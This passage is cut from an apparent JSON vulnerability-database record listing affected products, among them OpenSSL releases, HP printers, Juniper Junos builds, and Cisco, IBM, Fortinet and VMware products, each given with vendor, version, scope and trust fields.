        "scope": "eq",
        "trust": 0.3,
        "vendor": "rim",
        "version": "10.2.0.1055"
      },
      {
        "model": "laserjet m5025 multifunction printer q7840a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "48.306.1"
      },
      {
        "model": "flex system p260 compute node",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "(7895-22x)0"
      },
      {
        "model": "tivoli netcool/system service monitor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.1"
      },
      {
        "model": "snapdrive for unix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.2.2"
      },
      {
        "model": "jabber voice for android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "onepk all-in-one vm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "idp 4.2r1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "virtuozzo containers for linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "parallels",
        "version": "4.7"
      },
      {
        "model": "proxysgos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "6.5"
      },
      {
        "model": "junos 12.1r3",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "laserjet enterprise m603 series ce994a 2302963 436082",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "600"
      },
      {
        "model": "vsphere support assistant",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.5.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.37"
      },
      {
        "model": "airwave",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "arubanetworks",
        "version": "7.2"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.0"
      },
      {
        "model": "laserjet enterprise m806 cz245a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "color laserjet printer series q7493a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "470046.230.6"
      },
      {
        "model": "msr50 family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "proxysg sgos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "4.0"
      },
      {
        "model": "linerate",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "1.6.3"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.61"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2"
      },
      {
        "model": "tivoli netcool/system service monitor fp6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.41"
      },
      {
        "model": "communication server 1000e signaling server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.6"
      },
      {
        "model": "8.4-rc1-p1",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "junos 10.0s28",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "algo one",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.9"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1"
      },
      {
        "model": "isoc v200r001c02",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "9000"
      },
      {
        "model": "aura system manager sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "color laserjet cp6015 q3931a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "security information and event management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "9.1"
      },
      {
        "model": "color laserjet enterprise cp4525 cc493a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "10.0-release-p4",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "sylpheed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sylpheed",
        "version": "1.0.4"
      },
      {
        "model": "smartcloud entry",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1"
      },
      {
        "model": "content analysis system software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "1.1.4.2"
      },
      {
        "model": "ddos secure",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "0"
      },
      {
        "model": "utm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sophos",
        "version": "9.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.40"
      },
      {
        "model": "websphere datapower xml security gateway xs40",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.07"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1183.0"
      },
      {
        "model": "ip office server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "8.1"
      },
      {
        "model": "ssl visibility",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "3.7"
      },
      {
        "model": "fortigate build",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.2.0589"
      },
      {
        "model": "tivoli storage flashcopy manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.18"
      },
      {
        "model": "junos os 12.3r8",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "cms r17 r3",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "horizon workspace",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "1.8.1"
      },
      {
        "model": "enterprise manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "2.0"
      },
      {
        "model": "message networking",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "websphere datapower b2b appliance xb62",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.1.3"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.10"
      },
      {
        "model": "color laserjet cm6030 multifunction printer ce665a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "52.256.1"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "3.2.16"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.79"
      },
      {
        "model": "manageability sdk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "0"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "1.0"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.0.3"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "10"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "4.1.13"
      },
      {
        "model": "hp-ux b.11.23",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "security network intrusion prevention system gx5108",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "fortiwifi",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "0"
      },
      {
        "model": "vcenter server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.5"
      },
      {
        "model": "vix api",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "1.12"
      },
      {
        "model": "storevirtual fc 900gb china sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433011.5"
      },
      {
        "model": "websphere cast iron cloud integration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.16"
      },
      {
        "model": "junos 5.0r4",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5"
      },
      {
        "model": "fortiap",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "0"
      },
      {
        "model": "tivoli workload scheduler for applications",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.6"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.03"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.33"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2"
      },
      {
        "model": "scale out network attached storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.2.3"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "3.1.9"
      },
      {
        "model": "data ontap",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "6.4"
      },
      {
        "model": "storevirtual 900gb china sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433012.0"
      },
      {
        "model": "sylpheed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sylpheed",
        "version": "3.3"
      },
      {
        "model": "web security gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "websense",
        "version": "7.8.1"
      },
      {
        "model": "oncommand workflow automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "0"
      },
      {
        "model": "i v5r3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2"
      },
      {
        "model": "vsphere replication",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.5.1"
      },
      {
        "model": "websphere datapower xml security gateway xs40",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.02"
      },
      {
        "model": "clearpass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "arubanetworks",
        "version": "6.1.3"
      },
      {
        "model": "uacos c5.0r4.1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "laserjet enterprise p3015 ce525a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "junos 13.1r.3-s1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "webex messenger service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "web filter",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "websense",
        "version": "7.8.3"
      },
      {
        "model": "project openssl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.6"
      },
      {
        "model": "snapdrive for windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.152"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.1.2"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "5.6"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.10"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.3"
      },
      {
        "model": "family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3100v20"
      },
      {
        "model": "laserjet p2055 printer series ce459a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "20141201"
      },
      {
        "model": "color laserjet cm4730 multifunction printer cb483a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "proxysg sgos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "6.3"
      },
      {
        "model": "netscaler build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "9.196.4"
      },
      {
        "model": "real-time compression appliance",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.203"
      },
      {
        "model": "fortiweb",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.0.3"
      },
      {
        "model": "project openssl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8x"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.23"
      },
      {
        "model": "logcenter v200r003c10",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "dynamic system analysis",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.61"
      },
      {
        "model": "dgs-1210-28",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "4.00.012"
      },
      {
        "model": "ssl vpn 7.4r11.1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.20"
      },
      {
        "model": "laserjet enterprise m601 series ce989a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6000"
      },
      {
        "model": "telepresence supervisor mse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "80500"
      },
      {
        "model": "initiate master data service provider hub",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.5"
      },
      {
        "model": "network connect",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "6.3.0.13725"
      },
      {
        "model": "infosphere master data management server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "11.3"
      },
      {
        "model": "rational insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.11"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.152"
      },
      {
        "model": "color laserjet printer series q7534a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "300046.80.2"
      },
      {
        "model": "horizon workspace client for mac",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "1.8.1"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.51"
      },
      {
        "model": "rational build forge",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.2"
      },
      {
        "model": "storevirtual 3tb mdl sas storage/s-buy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "453012.5"
      },
      {
        "model": "netiq access manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "novell",
        "version": "4.0"
      },
      {
        "model": "flex system enterprise chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7893"
      },
      {
        "model": "big-ip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2"
      },
      {
        "model": "watson explorer",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0.4"
      },
      {
        "model": "s7700\u0026s9700 v200r005",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "flare experience for microsoft windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "1.1"
      },
      {
        "model": "netiq access manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "novell",
        "version": "3.2"
      },
      {
        "model": "application networking manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "command view for tape libraries",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "sparc enterprise m8000 xcp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "1117"
      },
      {
        "model": "oceanstor s2600t v100r005c30spc100",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "laserjet enterprise color mfp m575dn cd645a 2302963 436081",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "500"
      },
      {
        "model": "junos 12.1x45-d15",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.0"
      },
      {
        "model": "tivoli workload scheduler distributed fp03",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "7.4"
      },
      {
        "model": "project openssl 1.0.1h",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "fortiweb",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.1.2"
      },
      {
        "model": "storevirtual 450gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "453012.5"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.0.4"
      },
      {
        "model": "9.2-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "systems director storage control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.2.0"
      },
      {
        "model": "msr30-16 russian version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "jabber for windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "fortiwifi build",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.2.0589"
      },
      {
        "model": "laserjet enterprise color m855 a2w77a 2302963 436076",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "800"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "3.2.4"
      },
      {
        "model": "puredata system for hadoop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.01"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.9.3"
      },
      {
        "model": "telepresence video communication server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "cloudsystem chargeback",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "9.40"
      },
      {
        "model": "open source security information management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "3.1.10"
      },
      {
        "model": "blackberry os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "rim",
        "version": "10.1.0.2354"
      },
      {
        "model": "one-x communicator for mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "x1.0.3"
      },
      {
        "model": "data ontap",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "7.0"
      },
      {
        "model": "aura application server sip core pb3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "53003.0"
      },
      {
        "model": "splunk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "4.3.3"
      },
      {
        "model": "netiq access gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "novell",
        "version": "0"
      },
      {
        "model": "security analytics platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "6.6"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.2"
      },
      {
        "model": "idp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "4.1"
      },
      {
        "model": "security threat response manager 2012.1r8",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "project openssl 1.0.0f",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "unified ip phone",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "99710"
      },
      {
        "model": "linux lts i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "12.04"
      },
      {
        "model": "project openssl d",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "storevirtual fc 900gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "473012.0"
      },
      {
        "model": "laserjet m3027 multifunction printer cc479a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "48.306.1"
      },
      {
        "model": "sparc enterprise m3000 xcp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "1117"
      },
      {
        "model": "color laserjet cp6015 q3932a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "53.236.1"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "4.1"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.1"
      },
      {
        "model": "websphere mq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.3"
      },
      {
        "model": "sylpheed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sylpheed",
        "version": "2.0"
      },
      {
        "model": "enterprise linux long life server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5.6"
      },
      {
        "model": "laserjet enterprise mfp m525f cf117a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5000"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.9.134.14"
      },
      {
        "model": "management center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "1.0"
      },
      {
        "model": "ftp server",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cerberus",
        "version": "7.0.0.3"
      },
      {
        "model": "junos 11.1r4",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "ata analog telephone adaptor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1870"
      },
      {
        "model": "sylpheed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sylpheed",
        "version": "2.0.2"
      },
      {
        "model": "project openssl 1.0.0b",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1.1"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "6.4"
      },
      {
        "model": "fortimail",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "4.3.7"
      },
      {
        "model": "one-x communicator for microsoft windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2.2"
      },
      {
        "model": "expressway series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.6"
      },
      {
        "model": "fortiweb",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.0.4"
      },
      {
        "model": "storage management initiative specification providers fo",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "0"
      },
      {
        "model": "smart analytics system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "57100"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.1"
      },
      {
        "model": "storevirtual 1tb mdl sas storage/s-buy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433012.0"
      },
      {
        "model": "msr30-1x russian version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.15"
      },
      {
        "model": "proventia network security controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.1209"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.79"
      },
      {
        "model": "puremessage for unix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sophos",
        "version": "4.04"
      },
      {
        "model": "junos 11.4r5.5",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "cognos business intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.4.1"
      },
      {
        "model": "storevirtual 600gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "453012.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.74"
      },
      {
        "model": "laserjet enterprise p3015 ce595a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "laserjet p4515 cb514a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.213.1"
      },
      {
        "model": "scale out network attached storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.0.0"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3"
      },
      {
        "model": "open source security information management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "4.1.2"
      },
      {
        "model": "smartcloud entry",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2"
      },
      {
        "model": "websphere datapower xml security gateway xs40",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.03"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.2"
      },
      {
        "model": "aura system manager sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "aura communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0"
      },
      {
        "model": "clustered data ontap antivirus connector",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0"
      },
      {
        "model": "sterling connect:direct",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.5"
      },
      {
        "model": "netscaler build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "9.070.5"
      },
      {
        "model": "content analysis system software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "1.1.1.1"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "4.1.11"
      },
      {
        "model": "security information and event management ga",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "9.4.0"
      },
      {
        "model": "junos 11.4r12-s1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
